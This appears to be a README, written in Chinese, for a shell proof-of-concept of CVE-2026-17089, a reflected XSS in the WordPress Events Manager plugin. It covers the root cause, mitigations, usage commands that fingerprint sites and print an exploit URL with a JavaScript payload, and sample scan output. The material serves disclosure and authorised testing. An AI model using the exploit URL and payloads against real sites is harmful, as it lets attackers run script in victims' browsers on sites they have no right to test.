针对 CVE-2026-17089 的 Shell PoC,这是 WordPress Events Manager 插件(<= 7.4.0.1)中的一个未认证反射型 XSS 漏洞;该脚本可对插件进行指纹识别并测试 header_format 反射。
<= 7.4.0.1 — 未认证反射型 XSS(header_format)作者: pwnVader · 许可证: MIT(仓库根目录)
| 组件 | Events Manager – Calendar, Bookings, Tickets, and more!(WordPress 插件) |
| 类型 | CWE-79 — 反射型跨站脚本 |
| 受影响版本 | <= 7.4.0.1 |
| 修复版本 | 后续 7.4.x 版本(在 EM_Events::output_grouped() 中应用了 wp_kses_post()) |
| CVE | CVE-2026-17089 — CVSS 3.1 6.1(AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N) |
| PoC | poc.sh |
短代码入口点使用 wp_kses() 对 header_format 进行清理,但未认证的
AJAX 操作 search_events_grouped 绕过了该清理,并将该值回显到
HTML 响应中(EM_Events::output_grouped())。远程未认证攻击者可以构造一个 URL,
使任何打开该 URL 的用户在受影响站点的源下执行任意 JavaScript
(UI:R)。
# Interactive menu
./poc.sh
# Read-only: fingerprint the plugin and test the unescaped reflection
./poc.sh check --target https://example.com
# Print the exploit URL (open it in a browser; the script runs in the target origin)
./poc.sh url --target https://example.com --payload "alert(document.domain)"
check)== CVE-2026-17089 PoC (check) ==
target: https://example.com
[1] Plugin fingerprint (read-only)
[PASS] Events Manager assets are served (plugin installed)
[info] Stable tag: 7.1.7
[PASS] version 7.1.7 is in the affected range (<= 7.4.0.1)
[2] Unauthenticated reflection test (read-only, benign marker)
[PASS] endpoint reflected header_format UNESCAPED (the raw is in the response)
== RESULT: 3 PASS / 0 FAIL ==
VULNERABLE to CVE-2026-17089 (unauthenticated reflected XSS).
https://example.com/wp-admin/admin-ajax.php?action=search_events_grouped&scope=all&limit=5&header_format=<urlencoded payload>
readme.txt(Stable tag)和/或插件资源路径
/wp-content/plugins/events-manager/includes/js/events-manager.js。admin-ajax.php?action=search_events_grouped 发送一个无害标记
(``),将 header_format 设置为该标记,并检查
原始标记是否在响应体中被未转义地反射。header_format 应用 wp_kses_post(),覆盖所有调用方)。search_events_grouped AJAX 操作或过滤
header_format。仅用于授权的安全测试。该 PoC 为只读(check)或打印 URL(url);不会修改
任何数据。